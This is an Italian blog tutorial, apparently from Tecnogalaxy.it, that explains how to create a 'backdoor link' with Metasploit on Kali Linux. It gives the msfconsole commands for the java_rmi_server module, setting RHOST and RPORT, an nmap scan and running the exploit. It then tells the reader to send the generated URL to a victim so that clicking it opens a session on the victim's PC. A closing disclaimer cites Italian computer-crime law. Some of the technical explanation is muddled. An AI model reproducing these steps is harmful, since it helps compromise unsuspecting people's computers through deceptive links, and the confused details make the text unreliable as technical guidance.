
Creare link backdoor
Abbiamo analizzato già alcune volte i modi per creare link backdoor, ovvero dei link che una volta aperti dalla vittima aprono una comunicazione tra il computer attaccante e il computer target. Nel corso del tempo analizzeremo molti metodi simili per creare questo tipo interessante di backdoor, ma entriamo nel dettaglio di quello di cui stiamo parlando oggi; servirsi di un link per creare una backdoor in un PC è un metodo molto funzionante in quanto è abbastanza facile camuffare il codice maligno e spedirlo alla vittima, che inconsapevolmente cliccherà su qualcosa che non farà altro che cagionare danni. E’ sempre bene controllare ciò su cui clicchiamo ogni giorno, in quanto potremo ritrovarci “spie” non gradite sul computer che possono avere, a nostra insaputa, il pieno comando del PC. Vediamo adesso come dar vita al nostro link maligno; per prima cosa dobbiamo servirci di Kali Linux; apriamo un terminale e digitiamo il comando “msfconsole”, che aprirà la console di Metasploit Framework che ci guiderà durante tutto il processo di creazione della nostra backdoor.
Procediamo rispettivamente con i seguenti comandi:
-use exploit/multi/misc/java_rmi_server
-set RHOST “ip remoto”
-set RPORT “porta remota”
N.B Come sempre ricordo che la porta remota possiamo ottenerla con una scansione di nmap; il comando per eseguirla è:
nmap “inserire indirizzo IP remoto”
exploit
A questo punto il terminale si metterà in ascolto e non dovremo fare altro che copiare l’indirizzo “Local IP” comparso sul terminale e inviarlo alla vittima, che aprendolo creerà una sessione tra il suo pc e il nostro. In questo caso, per esempio, il Local IP comparso nel mio terminale è:
https://192.168.43.100:8080/PFu15lKmllfGi06
Ricordo che questo articolo è stato creato solamente a scopo informativo e per lo studio delle vulnerabilità informatiche. Non è da intendersi come un incitazione a compiere azioni di danneggiamento verso sistemi informatici non propri. Tutto lo staff di Tecnogalaxy.it non si assume la responsabilità per eventuali usi scorretti che ne farete. Avvisiamo inoltre che viene sanzionato chi, senza essere autorizzato, intercetta, impedisce, interrompe o rivela comunicazioni informatiche, (art. 617 quater c.p.); installa apparecchiature dirette ad intercettare, interrompere o impedire comunicazioni informatiche (art. 617 quinquies c.p.); falsifica, altera, sopprime o falsifica la comunicazione informatica acquisita mediante l’intercettazione (art. 617 sexies c.p.); distrugge, deteriora, cancella dati, informazioni o programmi informatici (art. 635 bis c.p.).
Ti è stato di aiuto questo articolo? Aiuta questo sito a mantenere le varie spese con una donazione a piacere cliccando su questo link. Grazie!
Seguici anche su Telegram cliccando su questo link per rimanere sempre aggiornato sugli ultimi articoli e le novità riguardanti il sito.
Se vuoi fare domande o parlare di tecnologia puoi entrare nel nostro gruppo Telegram cliccando su questo link.
© Tecnogalaxy.it - Vietato riprodurre il contenuto di questo articolo.
I PIÙ LETTI
ARTICOLI RECENTI